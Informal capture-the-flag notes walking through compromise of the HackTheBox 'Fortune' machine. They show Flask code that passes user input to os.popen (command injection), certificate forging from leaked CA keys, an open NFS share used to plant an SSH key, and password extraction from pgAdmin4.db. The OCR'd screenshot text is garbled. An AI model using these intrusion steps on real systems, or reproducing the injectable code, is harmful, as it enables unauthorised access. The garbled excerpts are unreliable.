Nmap scan:
Dirb scan:
Browsing the site gives us this:
Responses with some generated fortune cookie advise:
Let’s try and catch that request, see what we can make out of it
Db=fortunes2…
Send this request to repeater and play with it
![Machine generated alternative text:
'OST 'select HTTP/I.I
{ost: 10.10.10.127
Jser-Agent: mozi11a/5.o (Xll; Linux 1686; rv:6e.0) Geck0/20100101 Firefox/60.e
iccept: text/html, application/xhtml•xml,
en-lJS, q=O.5
\ccept-Encoding: gzip, deflate
http://10.
:ontent-Type: application/x-www- form-urlencoded
:ontent-Length: 12
:onnection: close
Jpg rade•lnsecure -Requests: 1
ib•fortunes2
Send to Spider
Do an active scan
Send to Intruder
Send to Repeater
Send to Sequencer
Send to Comparer
Send to Decoder
Request in browser
Engagement tools [Pro version only]
Change request method
Change body encoding
copy URL
Copy as curl command
Copy to file
Paste from file
Save item
Don't intercept requests
Do intercept
Convert selection
URL-encode as you type
Cut
Copy
Paste
Message editor help
proxy interception help
Ctrl
ctrl
Ctrl+V](https://lh5.googleusercontent.com/ow2ZUqb2QB2KjTW9QD6b9EfPlAsuBWsStJVP1du7Eziw6gGGgmbBnKr131WPIu4iFNFc_LOPhnV2f_cMADLCivhpqqaRqkwTkBi6Vfr3yABUyyTOU6ErnjzBmxpKSpkgUuL7MF8)
Gotcha:
Found 3 users:
Intresting directories:
Cat fortuned.py:
![Machine generated alternative text:
from flask import Flask. request. render_template. abort
import os
app = Flask(_name_)
def fortuned():
cmd = 'lusqgames/fortune '
dbs = ['fortunes'. 'fortunes2', •recipes', •startrek'. •zippy]
selection = request.form['db'l
shell cmd = cmd + selection
result = os.popen(shell_cmd).read()
return render_template('display.html'. output=result)](https://lh6.googleusercontent.com/mG8Kx8Z7-Xih0kGv9y0aWQHJ2x4w2_BaYyn-Y3D_9zoZ32XBwyC8NL8BJVdN5nc5CW2UN3-HfrE-N93YGiKK09qsOm0P_zdb3unHy7xpmXW-7W6PyQ2plcmmt39cA1MbeIUd4_g)
Found a .pem file in bob’s directory:
Copied it to our own kali and use the .pem file together with ssh for connection
Tried playing with it but unsuccesful
Tried playing balsier
Found the intermediate key files. So now the plan is to create own cert and sign it with the intermediate files
Searching forum I found this interesting link
TODO: next
Plan 2:
Found the ca.key file, try copying it
Found the server.crt
Created the p12 file with the server.crt and the intermediate.key.pem file
Imported that p12 file into firefox and connected to 443 using “https://fortune.htb/
After that we got an rsa to create ssl connection, using that rsa key we got a shell but couldn’t do anything in it.
After some trials and errors decided to enumerate again, started with nmap scan and we saw some different results as before…
We see rpc in open on port 2049 and there are vulnerabilities in it.
https://resources.infosecinstitute.com/exploiting-nfs-share/
With the showmount -t fortune.htb we see there is a share ‘home’ accessible for everyone
–> we mount this share into our /mnt direcotry but encounter some problems.
We try accessing this share with root rights. While we have connection in shell with normal user.
Try making normal user and use that account to mount the share.
“`Mount -t nfsuser@fortune.htb:/home -o nolock/mnt“`
We got it and we have access to same directories we had using Burp but we can access Charlies folders too now.
Here we see that there is a file ‘Authorized keys’ and from here we can add our own key so we create an own ssh key with ssh-keygen
Add the .pub output to authorized keys and use the other file to pass along with ssh tag -I
From here we have a shell as charlie and we can access beneath the /home folder too.
Now onto priv esc.
Read access to passwd
Read access to pgAdmin4.db
Should be a server.db and a user.db
From here we can get encrypted passwords with it’s salts(?)
Decrypt those together and we have the password
Pentesting with Rival 